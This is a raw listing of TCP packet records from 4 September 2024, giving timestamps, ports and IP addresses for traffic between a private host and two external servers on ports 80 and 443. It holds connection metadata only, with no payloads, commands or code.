Sep 4, 2024 17:37:08.399071932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399084091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399091959 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399116039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399271011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399281979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399290085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399298906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399308920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399316072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399318933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399329901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399337053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399338961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399349928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399355888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399370909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399384975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399534941 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399547100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399554968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399565935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399574995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399579048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399585009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399593115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399596930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399607897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399611950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399631977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399643898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399759054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399770021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399779081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399787903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399799109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399799109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399812937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399816990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.399823904 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399830103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.399851084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405755997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405766964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405775070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405791044 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405802011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405802965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405810118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405828953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405838966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405869961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405879974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405903101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405915022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405955076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.405982018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.405994892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406003952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406013966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406025887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406049013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406054974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406074047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406084061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406090975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406111002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406117916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406161070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406204939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406233072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406244993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406270981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406277895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406302929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406306982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406316996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406331062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406339884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406362057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406466961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406477928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406486988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406496048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406507969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406507969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406519890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406528950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406548023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406565905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.406568050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406606913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.406991005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407038927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407043934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407057047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407083988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407094955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407099009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407105923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407116890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407126904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407141924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407154083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407198906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407208920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407217026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407227993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407238960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407249928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407267094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407306910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407318115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407326937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407340050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407352924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407370090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407406092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407417059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407426119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407444954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407453060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407527924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407538891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407547951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407557964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407568932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407569885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407581091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407591105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407594919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407605886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407608032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407628059 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407646894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407782078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407793045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407800913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407810926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407820940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407829046 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407833099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407836914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407844067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407855034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407860994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407862902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407880068 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407901049 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407905102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407915115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407939911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407949924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.407974005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407984018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.407993078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408005953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408015013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408034086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408050060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408210993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408221960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408231020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408242941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408252954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408252954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408263922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408274889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408274889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408286095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408292055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408298016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408313036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408330917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408504963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408514977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408523083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408533096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408543110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408551931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408551931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408564091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408574104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408576012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408581972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408588886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408590078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408600092 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408610106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408610106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408629894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408646107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408782959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408793926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408802986 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408813953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408823967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408823967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408834934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408843040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408847094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408858061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408868074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408874989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408900976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.408919096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.408962011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409085989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409097910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409106016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409116983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409126043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409131050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409141064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409148932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409152985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409158945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409163952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409171104 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409181118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409190893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409200907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409209967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.409214973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409214973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409214973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.409243107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.477509975 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.477535963 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.477571011 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.477581978 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.477617025 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.477632999 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.477967978 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.477981091 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.478035927 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.478044033 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.478081942 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.479022980 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479038000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479088068 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.479095936 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479129076 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.479753971 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479768038 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479818106 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.479825020 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.479871988 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.480369091 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.480382919 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.480434895 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.480442047 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.480478048 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481000900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481017113 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481060982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481067896 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481102943 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481499910 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481513023 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481574059 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481581926 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481612921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481832027 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481847048 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481901884 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.481914043 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.481950998 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.482364893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482410908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482418060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482425928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482450008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482464075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482495070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482506037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482516050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482526064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482530117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482548952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482569933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.482589006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.482625961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483263016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483273983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483283997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483313084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483314991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483324051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483335018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483335018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483346939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483359098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483381033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483541012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483552933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483561993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483572960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483582973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483597994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483611107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483663082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483671904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483680964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483691931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483699083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483702898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483714104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483720064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483724117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483735085 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483740091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483747005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483757019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483762026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483776093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483792067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483800888 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483812094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483833075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483845949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483848095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483856916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483880043 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483906031 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.483978987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483989954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.483998060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484008074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484018087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484019041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.484030008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.484040022 CEST	80	49717	147.45.44.104	192.168.2.6
